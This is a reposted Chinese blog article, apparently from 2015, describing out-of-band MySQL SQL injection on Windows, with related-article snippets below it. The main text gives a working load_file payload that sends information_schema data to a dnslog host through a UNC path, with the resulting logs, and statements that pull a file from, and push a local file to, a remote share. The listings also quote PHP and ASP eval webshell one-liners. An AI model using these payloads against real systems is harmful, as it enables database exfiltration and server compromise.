关于sql注入远程读取文件

最新推荐文章于 2024-05-24 08:55:45 发布
最新推荐文章于 2024-05-24 08:55:45 发布
阅读量238 收藏
点赞数
文章标签: 操作系统 python 数据库
原文链接:https://my.oschina.net/rookier/blog/390957
版权

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

准备工作:先来设置windows2003开启匿名共享

http://wenku.baidu.com/view/684d26a4f524ccbff1218452.html

我们知道win中访问远程目录的写法是\\123.123.123.123\a 

那么我们可以使用mysql的load_file函数去读远程文件,而如果这个远程ip是我们预先设定并监控的,抓一下80的log会看到什么呢?让我们试一下。 


执行这个语句 

select load_file(concat('\\\\bb131f.dnslog.info\\',(select concat(table_schema,table_name,column_name) from information_schema.columns limit 0,1)));


日志里看到的什么呢? 

[03/Mar/2015:18:33:49 +0800] 124.205.254.6 - - bb131f.dnslog.info OPTIONS / HTTP/1.1 200 "Microsoft-WebDAV-MiniRedir/5.1.2600" 
[03/Mar/2015:18:33:50 +0800] 124.205.254.6 - - bb131f.dnslog.info PROPFIND /information_schemaCHARACTER_SETSCHARACTER_SET_NAM HTTP/1.1 405 "Microsoft-WebDAV-MiniRedir/5.1.2600"


哦呵呵呵 把注入语句的结果回显回来了,由于windows的特性访问ipc会webdav访问一下80端口。 

导入外部的文件到本地

select load_file("\\\\1.1.1.1\\1.txt") into outfile 'c:\\1.txt'

写入到远程共享

select load_file('c:\\1.txt') into outfile  "\\\\1.1.1.1\\2.txt"


转载于:https://my.oschina.net/rookier/blog/390957

weixin_34024034
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
另一种通过PL/SQL获取数据库服务器端文件的方法
ryan.gao的专栏
04-24 661
在上一篇文章  通过SQL查看alert_SID.log  中,使用了external table作为获取数据库服务器端文件的方法,这对于alert_sid.log来说问题不大,这个文件名是固定的,但如果需要查看trace文件,特别是event 10046的文件就很麻烦了,每个session都会生成一个不同名称的文件,需要每次都创建external table。这里考虑使用另外一种思路,通过j
minibb 2.1 (表)远程sql注入利用
jahn的专栏
10-30 539
vuln.: miniBB 2.1 (table) Remote SQL Injection Exploit download: http://www.minibb.net/download.php?file=minibb21 dork: "These forums are running on" "miniBB" author: irk4z@yahoo.pl gr
SQL注入中的文件读写操作:技术解析与防范策略
最新发布
weixin_43822401的博客
05-24 476
SQL注入攻击是网络世界中的一个严峻问题,它允许攻击者通过构造特殊的SQL语句来操纵数据库。在某些高级的SQL注入攻击中,攻击者不仅能获取数据,还能读取和写入服务器上的文件。本文将深入探讨SQL注入中的文件读写操作,提供详细的技术解析和实用的防范策略。SQL注入文件读写是指攻击者利用SQL注入漏洞,读取或写入服务器上的文件。这种攻击可以用于窃取敏感信息、上传恶意代码或实现持久化控制。
模拟sql注入实现远程桌面登录
08-26 282
首先用sql注入文件命令y url+一句话 into outfile 绝对路径/test.php 用蚁剑连接打开连接的终端 先看用户的权限 创建一个用户将它放入队列中 查看3389端口是否开启 0xd3d 16进制解码为3389 打开远程桌面连接输入新建的用户和密码 成功远程桌面连接 转载于:https://www.cnblogs.c...
SQL Server 读批量文件txt数据入库
08-29 340
--创建表 USE [Test] GO CREATE TABLE [dbo].[AccountYh]( [id] [int] NULL, [Account] [nvarchar](200) NULL, [Other] [nvarchar](2000) NULL ) ON [PRIMA...
SQL注入漏洞实现OS远程控制及防范
weixin_43526443的博客
04-02 414
一、提前了解     1.一句话木马: 一句话木马是一种短小精悍的木马客户端,隐蔽性好,且功能强大。 **PHP**:<?php @eval($_GET['test'])?> **ASP**:<%eval request(“test”)%> **ASP.NET**:<%@ Page Language=“Jscript”%&gt...
Sql注入工具_动力节点Java学院整理
09-09
9. **Safe3 SQL Injector**:这款工具是最强大且易于使用的渗透测试工具之一,支持多种数据库系统,自动检测和利用SQL注入,功能包括读取数据库、执行SQL语句、控制后门等。 这些工具的存在,一方面警示我们数据库...
sql injection(SQL注入)教程
10-25
最后,**SQL注入写入Webshell**是攻击者通过SQL注入获得服务器的命令执行能力,进而植入Webshell,实现对目标服务器的远程控制。 了解并防范这些SQL注入方法是确保网络安全的关键。开发者应遵循参数化查询、预编译...
高级SQL注入拿shell,一般黑客不知道1
08-08
标签“sql web安全”表明这是关于SQL(结构化查询语言)在Web安全领域的应用,特别是如何防止SQL注入攻击以保护Web应用程序。 文章内容详细描述了一个高级的SQL注入过程,包括以下步骤: 1. **创建表**:攻击者...
sql注入提权拿服务器
12-06
SQL注入是一种常见的网络安全漏洞,它发生在应用程序未能充分验证或过滤用户输入的数据时,导致恶意SQL代码可以被插入到数据库查询中。"sql注入提权拿服务器"这个话题涉及到利用SQL注入漏洞来提升权限并最终控制...
php打开远程文件的方法和风险及解决方法
10-26
这就是所谓的“远程文件包含”漏洞,它可能导致跨站脚本(XSS)、SQL注入等安全威胁。 为了防止这种风险,我们需要采取以下措施: 1. **过滤输入**:确保所有用户提供的数据在被用作文件名之前都经过适当的过滤和...
利用MySQL load_file函数获取服务器文件试验
12-15
本文讨论了在MySQL环境下如何通过load_file函数获取服务器文件的方法,并针对特殊文件名给出了可行的解决办法。
RemoteSQL 远程访问控制数据库软件 v1.03a
11-01
是Windows平台上基于标准SQL命令的一款远程数据库访问控制软件,无论被控制数据库的机器是否处于局域网内或是通过代理上网,只要控制与被控制一方具有相对固定的外部IP(动态或静态获得),就都可以使用此软件进行远程数据库控制。它支持多种数据库系统,包括Paradox 、Access 、Foxpro 、Dbase及MS SQL Server 、Oracle 、DB2 、Infomix等,可选择数据库及其中的表,查看表中各字段的详细信息,运行标准SQL语句修改数据表、字段、数据内容等,同时显示操作的结果,无论宽带窄带上网,显示结果速度都很快,效果就象在本地运行查询分析器一般。双方同时还可以进行文字交流,就象聊天一样,而无需登录其它服务器。控制方还可以随时查看被控方的屏幕画面
Microsoft Windows WebDAV Mini-Redirector远程堆溢出漏洞(MS08-007)
黑客攻防 | .net 源代码下载 | ASP.NET开发 | ORACLE数据库开发 | JAVASCRIPT脚本下载 | java源码下载
03-05 1386
导读:   涉及程序:   Microsoft Windows      描述:   Microsoft Windows WebDAV Mini-Redirector远程堆溢出漏洞(MS08-007)      详细:   Microsoft Windows是微软发布的非常流行的操作系统。   Windows系统的WebDAV客户端程序实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞通过
what is “Microsoft-WebDAV-MiniRedir/5.1.2600″ ?
deadcode
11-28 611
10 1月 2009 So, what is “Microsoft-WebDAV-MiniRedir/5.1.2600″ ? Author: 大大狗 | Category: 資訊科技 最近看到很多很奇怪的要求連線到我的 Apache 在 log 中發現了許多的怪連結, 比方說這個 [10/Jan/2009:17:58:31 +0800] “OPTIONS / HTTP/1.1″ 200 ...
常见时间格式 UTC/GMT/CST 格式化处理
codezha的博客
08-30 9833
前后端我们通常都会遇到时间格式化处理的问题,通常我们都会采用时间处理插件moment.js或day.js来快速处理,如果只是简单的处理,也会采取自定义简单时间处理的方法。 day.js使用传送门 首先简单介绍下常见的几种时间: CST 北京时间,China Standard Time,又名中国标准时间 中部标准时间(北美洲),Central Standard Time (USA) UT-6:00 澳州中部时间,Central Standard Time (Australia) UT+9:30 中国时间,Ch
MySQL远程导入数据LOAD DATA LOCAL INFILE ...
热门推荐
很多时候,你缺少的不是知识而是热情
11-13 1万+
假设客户端与MYSQL服务器不在同一机器 导入文件在客户端机器上/usr/jfy/tmp/scpcdr.txt,在客户机登录mysql后,执行下面导入语句: LOAD DATA LOCAL INFILE  "/usr/jfy/tmp/scpcdr.txt" into table scpcdr fields TERMINATED by '|'; 正常情况是可以成功的,如果出现提示:
docker webdav_【技术分享】利用WebDAV特性建立隐蔽后门
weixin_30928785的博客
01-14 517
译者:Ska预估稿费:200RMB投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿前言——隐蔽后门的设计与需求我最近一直想为Windows系统设计一个隐蔽后门,主要功能是:传递各种恶意的payloads(shellcode,二进制文件,脚本等等…)将其用作C&C通道为了取得成功,攻击者必须克服越来越多的挑战,特别是在企业环境中:绕过IDS / IPS绕过各种防护软件...
面试官问你SQL注入、XSS、文件上传、RCE远程命令执行漏洞如何进行回答
07-12
当面试官询问我SQL注入、XSS、文件上传以及RCE远程命令执行漏洞的相关知识时,你可以使用以下话术进行回答: 1. 面试官:请介绍一下SQL注入漏洞。 你:SQL注入是一种常见的web应用程序漏洞,攻击者通过在用户输入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值